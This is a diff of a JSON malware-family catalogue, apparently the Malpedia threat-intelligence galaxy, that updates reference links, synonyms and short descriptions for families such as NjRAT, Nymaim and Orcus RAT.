+ "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/",
+ "https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html",
+ "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://blog.talosintelligence.com/2021/07/sidecopy.html",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html"
],
"synonyms": [
- "Bladabindi"
+ "Bladabindi",
+ "Lime-Worm"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "a860d257-4a39-47ec-9230-94cac67ebf7e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b",
"value": "NjRAT"
},
@@ -34221,23 +36050,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf"
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9e4fd0d3-9736-421c-b1e1-96c1d3665c80",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124",
"value": "Nokki"
},
@@ -34246,9 +36066,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa",
+ "https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust",
+ "https://malgamy.github.io/malware-analysis/Nokoyawa/",
"https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/"
+ "https://github.com/MalGamy/YARA_Rules/blob/main/Nokoyawa.yara"
],
"synonyms": [],
"type": []
@@ -34256,6 +36080,20 @@
"uuid": "934a633a-21f7-4010-a83a-0b64c365355d",
"value": "Nokoyawa Ransomware"
},
+ {
+ "description": "A wiper that overwrites target files with itself, thus spreading in virus-fashion.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nominatus_toxic_battery",
+ "https://twitter.com/struppigel/status/1501473254787198977",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2fef9561-e16f-47a9-90c6-a68a1b20cc95",
+ "value": "NominatusToxicBattery"
+ },
{
"description": "An open source C2 framework intended for pentest and red teaming activities.",
"meta": {
@@ -34269,13 +36107,26 @@
"uuid": "b783b185-e05c-481b-8c04-d0ba1b745713",
"value": "NorthStar"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu",
+ "https://www.bitsight.com/blog/cova-and-nosu-new-loader-spreads-new-stealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a67b25dd-527f-40fa-b7e0-c93e856c0a4c",
+ "value": "Nosu"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer",
- "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf"
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/"
],
"synonyms": [],
"type": []
@@ -34300,9 +36151,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom",
- "https://twitter.com/malwrhunterteam/status/910952333084971008",
"https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/",
- "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin"
+ "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin",
+ "https://twitter.com/malwrhunterteam/status/910952333084971008"
],
"synonyms": [],
"type": []
@@ -34324,6 +36175,23 @@
"uuid": "25a5ded7-6167-4f9a-b55d-9cfc9a9a9f22",
"value": "NuggetPhantom"
},
+ {
+ "description": "Nullmixer is a dropper/loader for additional malware. It is known to drop a vast amount of different malware, such as info stealers, rats and additional loaders. Samples observed contained up to 8 additional payloads.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer",
+ "https://www.youtube.com/watch?v=v_K_zoPGpdk",
+ "https://www.youtube.com/watch?v=yLQfDk3dVmA",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.youtube.com/watch?v=92jKJ_G_6ho"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "430c92f4-95b4-4b1c-813a-46d3e53a0d1e",
+ "value": "Nullmixer"
+ },
{
"description": "",
"meta": {
@@ -34344,8 +36212,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit",
"http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf",
- "https://twitter.com/Bank_Security/status/1134850646413385728",
- "https://twitter.com/r3c0nst/status/1135606944427905025"
+ "https://twitter.com/r3c0nst/status/1135606944427905025",
+ "https://twitter.com/Bank_Security/status/1134850646413385728"
],
"synonyms": [],
"type": []
@@ -34359,8 +36227,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nworm",
"https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/",
- "https://bazaar.abuse.ch/browse/tag/N-W0rm/",
- "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-1/"
+ "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-1/",
+ "https://bazaar.abuse.ch/browse/tag/N-W0rm/"
],
"synonyms": [
"NWorm",
@@ -34372,39 +36240,32 @@
"value": "N-W0rm"
},
{
- "description": "",
+ "description": "Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim",
- "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
+ "https://blog.talosintelligence.com/goznym/",
+ "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/",
+ "https://www.sentinelone.com/blog/goznym-banking-malware-gang-busted/",
"https://www.cert.pl/en/news/single/nymaim-revisited/",
- "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled",
"https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/",
+ "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
+ "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0",
+ "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim",
"https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/",
"https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
- "https://bitbucket.org/daniel_plohmann/idapatchwork",
- "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded",
- "https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf",
- "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0",
"https://www.lawfareblog.com/what-point-these-nation-state-indictments",
- "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/",
- "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
+ "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf",
+ "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled",
+ "https://bitbucket.org/daniel_plohmann/idapatchwork"
],
"synonyms": [
"nymain"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "d36f4834-b958-4f32-aff0-5263e0034408",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937",
"value": "Nymaim"
},
@@ -34413,8 +36274,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/"
+ "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
],
"synonyms": [],
"type": []
@@ -34427,19 +36288,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
- "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
- "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://securelist.com/transparent-tribe-part-2/98233/",
"https://www.secrss.com/articles/24995",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
- "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
+ "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
"https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html",
- "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/"
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
+ "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
+ "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
+ "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -34452,8 +36313,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene",
- "https://sysopfb.github.io/malware/2020/02/28/Golang-Wrapper-on-an-old-malware.html",
- "https://habr.com/ru/post/27053/"
+ "https://habr.com/ru/post/27053/",
+ "https://sysopfb.github.io/malware/2020/02/28/Golang-Wrapper-on-an-old-malware.html"
],
"synonyms": [],
"type": []
@@ -34479,9 +36340,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus",
+ "https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf",
"https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw",
- "https://securelist.com/octopus-infested-seas-of-central-asia/88200/",
- "https://isc.sans.edu/diary/26918"
+ "https://isc.sans.edu/diary/26918",
+ "https://securelist.com/octopus-infested-seas-of-central-asia/88200/"
],
"synonyms": [],
"type": []
@@ -34498,15 +36360,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d20f9a41-db27-4d53-995e-547f86ff3d1e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2",
"value": "OddJob"
},
@@ -34515,8 +36368,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://web.archive.org/web/20160324035554/https://www.johannesbader.ch/2015/12/krakens-two-domain-generation-algorithms//"
+ "https://web.archive.org/web/20160324035554/https://www.johannesbader.ch/2015/12/krakens-two-domain-generation-algorithms//",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
],
"synonyms": [
"Bobax",
@@ -34532,21 +36385,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
+ "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e2fa7aea-fb33-4efc-b61b-ccae71b32e7d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "045df65f-77fe-4880-af34-62ca33936c6e",
"value": "Odinaff"
},
@@ -34555,10 +36399,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
"https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
- "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/"
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
],
"synonyms": [],
"type": []
@@ -34571,24 +36415,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"https://www.secjuice.com/fancy-bear-review/",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf"
],
"synonyms": [
"Sasfis"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "6d1e2736-d363-49aa-9054-9c9e4ac0c520",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b79a6b61-f122-4823-a4ab-bbab89fcaf75",
"value": "OLDBAIT"
},
@@ -34597,45 +36432,36 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer",
- "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/",
- "https://www.lastline.com/labsblog/attribution-from-russia-with-code/",
- "https://www.youtube.com/watch?v=wCv9SiSA7Sw",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights",
- "https://attack.mitre.org/groups/G0034",
- "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html",
- "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.youtube.com/watch?v=a4BZ3SZN-CI",
- "https://securelist.com/the-devils-in-the-rich-header/84348/",
- "https://securelist.com/olympic-destroyer-is-still-alive/86169/",
- "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/",
- "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
- "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://www.youtube.com/watch?v=rjA0Vf75cYk",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/",
+ "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
+ "https://www.lastline.com/labsblog/attribution-from-russia-with-code/",
+ "https://www.youtube.com/watch?v=1jgdMY12mI8",
+ "https://www.youtube.com/watch?v=wCv9SiSA7Sw",
+ "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/",
"https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/",
+ "https://securelist.com/the-devils-in-the-rich-header/84348/",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.youtube.com/watch?v=a4BZ3SZN-CI",
+ "https://attack.mitre.org/groups/G0034",
+ "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/",
+ "https://securelist.com/olympic-destroyer-is-still-alive/86169/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://www.mbsd.jp/blog/20180215.html",
"https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.youtube.com/watch?v=1jgdMY12mI8",
- "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/"
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
+ "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html",
+ "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/",
+ "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too"
],
"synonyms": [
"SOURGRAPE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "76d5c7a2-73c3-11e8-bd92-db4d715af093",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28",
"value": "Olympic Destroyer"
},
@@ -34671,11 +36497,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
- "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
+ "https://www.f-secure.com/weblog/archives/00002764.html",
"http://contagiodump.blogspot.com/2014/11/onionduke-samples.html",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
"https://blog.f-secure.com/podcast-dukes-apt29/",
- "https://www.f-secure.com/weblog/archives/00002764.html"
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
],
"synonyms": [],
"type": []
@@ -34688,8 +36514,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner",
- "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/",
+ "https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet",
"https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html",
+ "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/",
"https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html"
],
"synonyms": [
@@ -34707,10 +36534,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie",
"https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr"
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
"type": []
@@ -34723,9 +36550,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki",
+ "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html",
"http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html",
"https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519",
- "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html",
"https://forum.malekal.com/viewtopic.php?t=21806"
],
"synonyms": [],
@@ -34734,6 +36561,19 @@
"uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7",
"value": "Opachki"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opcjacker",
+ "https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "22f732f4-efcf-4eb5-8c51-8338dfd33297",
+ "value": "OpcJacker"
+ },
{
"description": "",
"meta": {
@@ -34791,8 +36631,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat",
- "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood"
+ "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood",
+ "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html"
],
"synonyms": [],
"type": []
@@ -34805,9 +36645,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard",
- "https://blog.netlab.360.com/orchard-dga/",
"https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/",
- "https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/"
+ "https://malverse.it/stack-string-decryptor-con-ghidra-emulator-orchard",
+ "https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/",
+ "https://blog.netlab.360.com/orchard-dga/"
],
"synonyms": [],
"type": []
@@ -34820,17 +36661,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/",
- "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/",
"https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html",
- "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://asec.ahnlab.com/en/45462/",
+ "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/",
+ "https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/",
"https://assets.virustotal.com/reports/2021trends.pdf",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/"
+ "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/"
],
"synonyms": [
"Schnorchel"
@@ -34845,11 +36688,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt",
+ "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/",
+ "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html",
"https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/",
"https://www.gdata.de/blog/2017/11/30151-ordinypt",
- "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html",
